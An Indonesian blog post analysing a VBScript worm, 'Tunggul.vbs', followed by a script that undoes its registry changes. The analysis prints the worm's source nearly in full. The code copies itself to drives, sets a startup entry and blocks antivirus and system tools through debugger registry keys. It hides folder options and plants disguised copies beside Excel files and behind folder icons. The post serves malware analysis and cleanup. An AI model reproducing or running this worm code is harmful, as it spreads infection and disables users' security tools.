pagi yang cerah: vbs tunggul kawung

Analisa Tunggul.vbs:

Quote:
Code:
on error resume next
Dim winpath, sispath, tempath, FlashDisk, fso, wsshell, nask, filekor
Dim Drives, Drive, cekdrive, tekvir, text, Buatfile, namafile, filetext
Dim DesPath1, DesPath2, Scut1, Scut2
Set fso = CreateObject("Scripting.FileSystemObject")
Set wsshell = CreateObject("WScript.Shell")
Set filetext = fso.OpenTextFile(WScript.ScriptFullName,1)
namafile = "Tunggul.vbs"
Set nask = fso.getfile(Wscript.ScriptFullname)
cekdrive = nask.drive.drivetype

Set winpath = fso.GetSpecialFolder(0)
Set sispath = fso.GetSpecialFolder(1)
Set tempath = fso.GetSpecialFolder(2)
Set text = nask.openastextstream(1, -2)
Randomize Timer
Aka=Int(rnd*1000)
Akb=Int(rnd*30)
If Akb=0 Then Akb=10
Tamb=String(Akb,"-")
tekavir = text.readline
tekvir="' "&Aka&Tamb&vbCrLf
Do While Not text.atendofstream
tekvir = tekvir&text.readline
tekvir = tekvir&vbCrLf
Loop
Shortcut()
sudah=0

script di atas adalah setingan/property/argumen utk script berikutnya,
di antaranya perintah looping secara random dalam aksinya.

Code:
Do
Set filekor = fso.getfile(winpath & "\" & namafile)
filekor.Attributes = 32

cari file ":\Windows\Tunggul.vbs"
lalu ganti attributes-nya "archive" dgn tujuan agar bisa di-overwrite.

Code:
Set filekor = fso.createtextfile(winpath & "\" & namafile, 2, True)
filekor.write tekvir
filekor.Close

buat file ":\Windows\Tunggul.vbs"

Code:
Set filekor = fso.getfile(winpath & "\" & namafile)
filekor.Attributes = 39

seting attibut file Tunggul.vbs
gw baca di
http://sallisawok.org/cas...es_property.htm
http://ns7.webmasters.com...es_property.htm
kok gak ada nilai 39 ya.. salah ketik kali yee..

Code:
For Each FlashDisk In fso.drives
If (FlashDisk.drivetype = 1 Or FlashDisk.drivetype = 2) And FlashDisk.Path <> "A:" Then
Set filekor = fso.getfile(FlashDisk.Path & "\" & namafile)
filekor.Attributes = 32
Set filekor = fso.createtextfile(FlashDisk.Path & "\" & namafile, 2, True)
filekor.write tekvir
filekor.Close
End If
Next

buat file Tunggul.vbs di Floppy A & removable disk.

Code:
rdw="REG_DWORD"
Smwc = "\Software\Microsoft\Windows\CurrentVersion\"
Hsmwci = "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\"
wsshell.regwrite "HKLM"&Smwc&"Run\WinSistem", "wscript.exe " & winpath & "\" & namafile

memasukan Tunggul.vbs ke startup via registry.

Code:
wsshell.regwrite Hsmwci&"cmd.exe\Debugger"," "
wsshell.regwrite Hsmwci&"msconfig.exe\Debugger"," "
wsshell.regwrite Hsmwci&"regedit.exe\Debugger"," "
wsshell.regwrite Hsmwci&"PCMAV.exe\Debugger"," "
wsshell.regwrite Hsmwci&"PCMAV-CLN.exe\Debugger"," "
wsshell.regwrite Hsmwci&"PCMAV-RTP.exe\Debugger"," "
wsshell.regwrite Hsmwci&"PCMAV-SE.exe\Debugger"," "
wsshell.regwrite Hsmwci&"VB6.exe\Debugger"," "
wsshell.regwrite Hsmwci&"autorun.exe\Debugger"," "
wsshell.regwrite Hsmwci&"ansav.exe\Debugger"," "
wsshell.regwrite Hsmwci&"ansavgd.exe\Debugger"," "
wsshell.regwrite Hsmwci&"viremoval.exeDebugger"," "
wsshell.regwrite Hsmwci&"avscan.exe\Debugger"," "
wsshell.regwrite Hsmwci&"avgnt.exe\Debugger"," "
wsshell.regwrite Hsmwci&"iexplore.exe\Debugger"," "
wsshell.regwrite Hsmwci&"firefox.exe\Debugger"," "

memblok file² EXE yang disebutkan di atas.
terlihat ada salah ketik lagi pada "viremoval.exeDebugger"
seharusnya "viremoval.exe\Debugger"

Code:
wsshell.RegWrite "HKCU"&Smwc&"Policies\Explorer\NoFind", "1", rdw
wsshell.RegWrite "HKCU"&Smwc&"Policies\Explorer\NoFolderOptions", "1", rdw
wsshell.RegWrite "HKCU"&Smwc&"Policies\Explorer\NoRun", "1", rdw

menghilangkan/menyembunyikan:
1. menu "Search" & "Run" di start menu.
2. menu "Folder Options" di explorer.

Code:
wsshell.RegWrite "HKCU"&Smwc&"Policies\System\DisableRegistryTools", "0", rdw
wsshell.RegWrite "HKCU"&Smwc&"Policies\System\DisableTaskMgr", "0", rdw

maksudnya mungkin mau memblok regedit & task manager, tapi lagi² salah ketik :D
seharusnya, value-nya bukan "0" tapi "1"
lagian regedit.exe udah diblok di script sebelumnya.

Code:
wsshell.regwrite "HKCR\vbsfile\DefaultIcon", "shell32.dll,2"

mengganti icon file VBScript jadi icon folder.

Code:
If Minute(Now)=1 and sudah<>1 Then
Tularifiledoc()
sudah=1
End If
If cekdrive <> 1 Then Wscript.sleep 100000
Loop While cekdrive <> 1

Sub Tularifiledoc()
Set Drives=fso.drives
For Each Drive In Drives
If Drive<>"A:" Then
If Drive.IsReady Then
Cari Drive & "\"
End If
End If
Next
End sub

menyisipkan malware ke file dokumen (.DOC ?) di semua drive,
sehingga system akan terasa berat.

Code:
Sub Shortcut()
DesPath1 = wsshell.SpecialFolders("Desktop")
DesPath2 = wsshell.SpecialFolders("StartUp")
Set Scut1 = wsshell.CreateShortcut(DesPath1 & "\Harry Potter.lnk")
Set Scut2 = wsshell.CreateShortcut(DesPath2 & "\Bogor Kota Hujan.lnk")
Set Fileke1 = fso.createtextfile(sispath& "\iexplore.vbs", 2, True)
Set Fileke2 = fso.createtextfile(tempath& "\Bogor.vbs", 2, True)
Fileke1.Write tekvir
Fileke1.Close()
Scut1.TargetPath = wsshell.ExpandEnvironmentStrings(sispath&"\iexplore.vbs")
Scut1.Save
Fileke2.Write tekvir
Fileke2.Close()
Scut2.TargetPath = wsshell.ExpandEnvironmentStrings(tempath&"\Bogor.vbs")
Scut2.Save
End Sub

membuat file:
.\Windows\system32\iexplore.vbs
%temp%\Bogor.vbs
dan membuat shortcut-nya di startup & desktop dgn nama "Harry Potter" & "Bogor Kota Hujan"

Code:
Function Cari(Path)
On Error Resume Next
Dim Folder, Subfolder, SubFolders, File, Files, filekor
Set Folder=fso.GetFolder(Path)
Set Files=Folder.Files
For Each File In Files
If fso.GetExtensionName(File.Path)="xls" Then
namfa=fso.GetBaseName(File.Path)
Set filekor = fso.GetFile(File.Path)
filekor.Attributes = 39
Set Buatfile=fso.CreateTextFile(File.ParentFolder & "\" & namfa & ".vbs")
Buatfile.Write tekvir
Buatfile.Close()
End If
Next
Set SubFolders=Folder.SubFolders
For Each Subfolder In Subfolders
Cari Subfolder.Path
Next
End Function

1. cari file .XLS di semua folder
2. buat file .VBS sesuai nama file .XLS-nya di parent folder file .XLS berada.
3. seting tipe filenya menjadi "File Folder"
dari sini user akan tertipu, krn sebelumnya si malware telah mengubah icon .VBS menjadi icon folder.

Langkah² Pembersihan:

Quote:

* Memperbaiki registry.
copy paste code berikut ini ke Notepad, save dgn namafile.VBS, lalu dobelklik filenya.
Code:
Set WshShell = Wscript.CreateObject("Wscript.Shell")
Smwc = "\Software\Microsoft\Windows\CurrentVersion\"
Hsmwci = "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\"
WshShell.RegDelete "HKLM"&Smwc&"Run\WinSistem"
WshShell.RegDelete Hsmwci&"cmd.exe\"
WshShell.RegDelete Hsmwci&"msconfig.exe\"
WshShell.RegDelete Hsmwci&"regedit.exe\"
WshShell.RegDelete Hsmwci&"PCMAV.exe\"
WshShell.RegDelete Hsmwci&"PCMAV-CLN.exe\"
WshShell.RegDelete Hsmwci&"PCMAV-RTP.exe\"
WshShell.RegDelete Hsmwci&"PCMAV-SE.exe\"
WshShell.RegDelete Hsmwci&"VB6.exe\"
WshShell.RegDelete Hsmwci&"autorun.exe\"
WshShell.RegDelete Hsmwci&"ansav.exe\"
WshShell.RegDelete Hsmwci&"ansavgd.exe\"
WshShell.RegDelete Hsmwci&"avscan.exe\"
WshShell.RegDelete Hsmwci&"avgnt.exe\"
WshShell.RegDelete Hsmwci&"iexplore.exe\"
WshShell.RegDelete Hsmwci&"firefox.exe\"
WshShell.RegDelete "HKCU"&Smwc&"Policies\Explorer\NoFind"
WshShell.RegDelete "HKCU"&Smwc&"Policies\Explorer\NoFolderOptions"
WshShell.RegDelete "HKCU"&Smwc&"Policies\Explorer\NoRun"
WshShell.RegDelete "HKCU"&Smwc&"Policies\System\DisableRegistryTools"
WshShell.RegDelete "HKCU"&Smwc&"Policies\System\DisableTaskMgr"
WshShell.RegWrite "HKCR\vbsfile\DefaultIcon", "%SystemRoot%\System32\WScript.exe,2"
WshShell.RegWrite "HKCR\vbsfile\", "VBScript Script File"

pagi yang cerah

vbs tunggul kawung

0 komentar:

Posting Komentar

daftar isi

jembatan